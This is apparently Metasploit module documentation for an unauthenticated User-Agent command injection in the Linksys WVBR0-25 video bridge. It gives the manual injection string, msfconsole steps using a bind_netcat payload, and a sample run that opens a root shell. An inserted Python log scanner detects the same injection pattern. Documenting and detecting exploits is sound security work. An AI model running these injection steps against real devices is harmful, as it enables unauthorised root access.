## Vulnerable Application

  This module exploits a command injection vulnerability in the Linksys WVBR0-25 wireless video bridge. More information about the device itself can be found on AT&T's [manuals page](https://www.att.com/help/manuals/directv/dvrs.html) under the "DIRECTV Wireless Video Bridge Gen2 Product Manual" heading, as well as on this [unofficial product page](https://www.solidsignal.com/pview.asp?p=wvb). A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/).
  The latest confirmed vulnerable firmware version is 1.0.39. It may be possible to downgrade newer versions to a vulnerable version, but since firmware images are not available for download, this cannot be verified.

  There is no complete list of vulnerable firmware versions; however, the check method can reliably detect whether a device is vulnerable. The check method browses to the root of the device's webserver with a User-Agent set to `"; printf "[random string]`. If the response contains an MD5 hash of the random string, the device is vulnerable to command injection.

  Manual exploitation amounts to requesting the URI `http://<ip>/` with the User-Agent header set to `"; command;`.

  Version 1.0.39 was confirmed vulnerable, and firmware 1.0.41 was released to fix the vulnerability.
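
A detection-side check for the request shape described above, added here as an example and not part of the module or its documentation: it scans access logs for User-Agent values that contain a double quote followed by `;`. It assumes a proxy or sensor in front of the device that writes combined-format logs; the log lines, addresses and function names are constructed for illustration.

```python
import re

# Combined Log Format. Quoted fields may hold backslash escapes: Apache writes
# an embedded double quote as \" and nginx writes it as \x22.
LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

# The shape described above: a double quote followed by a `;` command
# separator, anywhere in the User-Agent value.
INJECTION_RE = re.compile(r'"\s*;')


def unescape(field):
    # Undo \xHH and backslash-escaped characters so the regex sees the header as sent.
    def repl(m):
        tok = m.group(1)
        return chr(int(tok[1:], 16)) if len(tok) == 3 else tok
    return re.sub(r'\\(x[0-9A-Fa-f]{2}|.)', repl, field)


def find_injection_attempts(log_text):
    """Return (source, timestamp, user_agent) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; skipped, not cleared
        ua = unescape(m.group("ua"))
        if INJECTION_RE.search(ua):
            hits.append((m.group("src"), m.group("ts"), ua))
    return hits


# Constructed sample log (documentation addresses, not real traffic).
SAMPLE_LOG = r'''
192.0.2.10 - - [01/Jan/2018:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [01/Jan/2018:10:09:50 +0000] "GET / HTTP/1.1" 200 498 "-" "\"; printf \"k3Zq9"
198.51.100.7 - - [01/Jan/2018:10:09:54 +0000] "GET / HTTP/1.1" 200 0 "-" "\x22; command;"
192.0.2.44 - - [01/Jan/2018:10:12:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.58.0 \"quoted\" text"
'''

if __name__ == "__main__":
    for src, ts, ua in find_injection_attempts(SAMPLE_LOG):
        print(f"{ts} {src} suspicious User-Agent: {ua!r}")
```

Lines that do not parse as combined format are skipped rather than treated as clean, so a production version should count and review them separately.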

## Verification Steps

  1. Make sure the device is running.
  2. Start msfconsole.
  3. Do: `use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth`
  4. Do: `set payload cmd/unix/bind_netcat`
  5. Do: `set RHOST [ip]`
  6. Do: `exploit`
  7. You should get a shell.

## Options

  **PAYLOAD**

  The `generic` and `netcat` payload types are valid.

## Scenarios

### Firmware 1.0.39

  The following is an example run getting a shell:

  ```
  msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
  payload => cmd/unix/bind_netcat
  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
  RHOST => 10.0.0.104
  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

  [*] 10.0.0.104:80 - Trying to access the device ...
  [*] Started bind handler
  [*] 10.0.0.104:80 - Exploiting...
  [*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
  id

  uid=0(root) gid=0(root)
  ```
